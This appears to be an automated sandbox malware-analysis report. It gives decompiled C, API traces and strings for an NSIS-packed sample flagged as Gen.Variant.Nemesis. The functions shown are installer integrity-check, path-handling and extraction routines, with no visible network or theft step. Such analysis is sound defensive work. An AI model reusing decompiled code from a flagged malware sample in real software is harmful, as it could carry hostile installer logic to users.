lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75AF3420), ref: 00403CED
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne), ref: 00403D54

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

RegisterClassW.USER32(00433EA0), ref: 00403D91
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
RegisterClassW.USER32(00433EA0), ref: 00403E56
DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne, xrefs: 00403C7C, 00403C84, 00403D27, 00403D2D, 00403D3D
RichEd32, xrefs: 00403E28
.DEFAULT\Control Panel\International, xrefs: 00403C58
1033, xrefs: 00403C0C, 00403C68
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BF1
RichEd20, xrefs: 00403E1A
RichEdit, xrefs: 00403E47
Call, xrefs: 00403CB4, 00403CBD, 00403CCB, 00403D1A, 00403D20
Control Panel\Desktop\ResourceLocale, xrefs: 00403C20
.exe, xrefs: 00403CFA
_Nb, xrefs: 00403D70, 00403DD8
RichEdit20W, xrefs: 00403E38, 00403E3E

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1627606066
Opcode ID: cf3279fe7f0dcda04763d777311536b3ad8b8334462163e510e5c591121a5e62
Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
Opcode Fuzzy Hash: cf3279fe7f0dcda04763d777311536b3ad8b8334462163e510e5c591121a5e62
Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe";
				 *0x434f0c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe", 0x400);
				_t89 = E0040602D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E0040653D(L"C:\\Users\\Arthur\\Desktop", _t91);
				E0040653D(0x444000, E00405E58(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					if( *0x434f14 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						if(_t57 == _v24) {
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004034CF(0x416a18, _t90) == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x434f14 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41ea18; // 0x7306a
							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x434f14 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42aa24) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x0040308e
0x00403094
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030d8
0x004030de
0x004030ef
0x004030f6
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031fe
0x00000000
0x00000000
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x00403251
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x0040321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403127
0x00403129
0x00403129
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x00403141
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403157
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a7
0x004031af
0x004031b2
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004031a7
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

}8@, xrefs: 00403227, 00403242
C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
Error launching installer, xrefs: 004030CD
Null, xrefs: 00403174
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
soft, xrefs: 0040316B
Inst, xrefs: 00403162
C:\Users\user\Desktop, xrefs: 004030D8, 004030DD, 004030E3

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-2527967322
Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040657A Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 196
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				intOrPtr _t93;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t93 =  *0x433edc; // 0x6c3640
					_t44 =  *(_t93 - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x0040657a
0x0040657a
0x0040657a
0x00406580
0x00406585
0x00406587
0x00406596
0x00406596
0x0040659e
0x0040659f
0x004065a0
0x004065a1
0x004065a4
0x004065ac
0x004065ae
0x004065bf
0x004065c2
0x004065c2
0x004065c6
0x004065cc
0x004065cf
0x004067aa
0x004067aa
0x004067b5
0x004067c1
0x004067c1
0x00000000
0x004065d5
0x004065da
0x004065ef
0x004065f0
0x004065f6
0x00406788
0x00406796
0x00406799
0x00406799
0x0040678a
0x0040678d
0x00406790
0x00406792
0x00406792
0x0040679b
0x0040679b
0x004067a1
0x004067a4
0x004065d7
0x00000000
0x004065d7
0x00000000
0x004067a4
0x004065fc
0x004065ff
0x0040660e
0x00406615
0x00406621
0x00406624
0x00406627
0x00406628
0x0040662d
0x00406633
0x00406636
0x00406639
0x0040672c
0x00406731
0x00406764
0x00406769
0x0040676e
0x00406773
0x00406773
0x00406778
0x0040677e
0x00406781
0x00000000
0x00406781
0x00406733
0x00406736
0x00406739
0x0040674e
0x00406755
0x0040673b
0x00406742
0x00406742
0x0040675d
0x00406760
0x00406724
0x00406725
0x00406725
0x00000000
0x00406760
0x00406646
0x0040664a
0x0040664a
0x0040664b
0x0040664d
0x0040668a
0x0040668d
0x0040669d
0x004066a0
0x004066a8
0x004066ae
0x004066ae
0x00406709
0x00406709
0x0040670b
0x00000000
0x00000000
0x004066b2
0x004066b7
0x004066b8
0x004066ba
0x004066d1
0x004066df
0x004066e5
0x004066e7
0x00406705
0x00406705
0x00406705
0x00000000
0x00406705
0x004066ed
0x004066f6
0x004066f9
0x004066ff
0x00406703
0x00000000
0x00000000
0x00000000
0x00406703
0x004066cb
0x004066cd
0x004066cf
0x00000000
0x00000000
0x00000000
0x004066cf
0x00000000
0x00406709
0x00406695
0x00000000
0x0040664f
0x0040666d
0x00406676
0x00406713
0x00406717
0x0040671f
0x0040671f
0x00000000
0x00406717
0x00406680
0x0040670d
0x00406711
0x00000000
0x00000000
0x00000000
0x00406711
0x0040664d
0x00000000
0x004065da

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00000000,00425A20,75AF23A0), ref: 004066A8
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000), ref: 00406779

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663
Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll, xrefs: 0040659F
@6l, xrefs: 00406587
Call, xrefs: 004065A4, 00406657, 0040665E, 00406662, 0040667F, 00406694, 004066A7, 004066BC, 004066E9, 0040671E, 00406724, 00406741, 00406754, 00406772, 00406778, 00406781, 004067B7
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: @6l$Call$Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-2146508706
Opcode ID: 71c82525ba0a65243e1f04eb87fe478d36a31e86dfe70ef8bf5ce9ddd18f012c
Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
Opcode Fuzzy Hash: 71c82525ba0a65243e1f04eb87fe478d36a31e86dfe70ef8bf5ce9ddd18f012c
Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							_t69 = E004060DF(_a8, 0x41ea20, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x425a20
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x425a20
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dd
0x004032df
0x004032df
0x004032e6
0x004032eb
0x004032f6
0x004032f6
0x00403308
0x004034bd
0x004034bd
0x00000000
0x0040330e
0x00403312
0x0040346a
0x004034ad
0x004034af
0x004034af
0x004034bb
0x004034c2
0x004034c5
0x00000000
0x00000000
0x00000000
0x00000000
0x004034bb
0x0040346f
0x00000000
0x00000000
0x00403471
0x00403474
0x00403477
0x0040347a
0x0040347c
0x0040347c
0x0040348c
0x00000000
0x00000000
0x00403493
0x0040349a
0x00403464
0x00403464
0x004034bf
0x004034bf
0x00000000
0x004034bf
0x0040349c
0x0040349f
0x004034a6
0x00000000
0x00000000
0x00000000
0x004034a8
0x00000000
0x00403474
0x0040331e
0x00403320
0x00403327
0x0040332e
0x0040332e
0x00403335
0x0040333d
0x00403347
0x0040334c
0x00403354
0x0040335e
0x00403361
0x00000000
0x00000000
0x00000000
0x00000000
0x00403367
0x00403367
0x00403367
0x0040336f
0x00403371
0x00403371
0x00403382
0x00000000
0x00000000
0x00403388
0x0040338b
0x00403391
0x00403397
0x00403397
0x004033a2
0x004033a8
0x004033ad
0x004033b4
0x004033b7
0x00000000
0x00000000
0x004033bd
0x004033c3
0x004033c5
0x004033ce
0x004033d0
0x00403401
0x00403407
0x00403413
0x00403418
0x00403418
0x0040341d
0x00403458
0x00000000
0x00000000
0x00000000
0x0040341f
0x00403423
0x0040343a
0x0040343f
0x00403442
0x00403445
0x00403448
0x0040344c
0x00000000
0x00000000
0x00000000
0x00403452
0x0040342c
0x00403433
0x00000000
0x00000000
0x00403435
0x00000000
0x00403435
0x0040341d
0x00403460
0x00000000
0x00403460
0x00000000
0x00403367

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033C5
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

}8@, xrefs: 004032B4
A, xrefs: 00403374
*B, xrefs: 004032DF
... %d%%, xrefs: 004033FB
A, xrefs: 0040347E
ZB, xrefs: 004033A2, 004033BD, 0040343A

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
